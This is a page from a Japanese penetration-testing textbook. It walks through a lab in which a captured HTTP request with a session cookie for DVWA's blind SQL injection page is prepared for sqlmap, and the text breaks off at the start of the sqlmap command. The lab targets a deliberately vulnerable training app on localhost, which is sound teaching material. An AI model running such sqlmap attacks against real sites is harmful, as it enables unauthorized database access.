
619
第7章 学習用アプリによる Webアプリのハッキング
"dvwa_sql_header.txt" ファイルの内容は、次の通りです。ここにCookie の情報
が載っています。
root@kali:~# cat dvwa_sql_header.txt
GET /DVWA-master/vulnerabilities/sqli_blind/?id=1&Submit=Submit
HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0)
Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/
xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: security=low; PHPSESSID=7dic1kpmjoa4kr3erff1pdcbsn ←
Connection: close
Upgrade-Insecure-Requests: 1
Sqlmapを実行する情報が揃いました。-u オプションに URL、--cookie オプショ
ンにCookie の値をセットして、Sqlmap を実行します。
root@kali:~# sqlmap -u "http://localhost//DVWA-master/ ...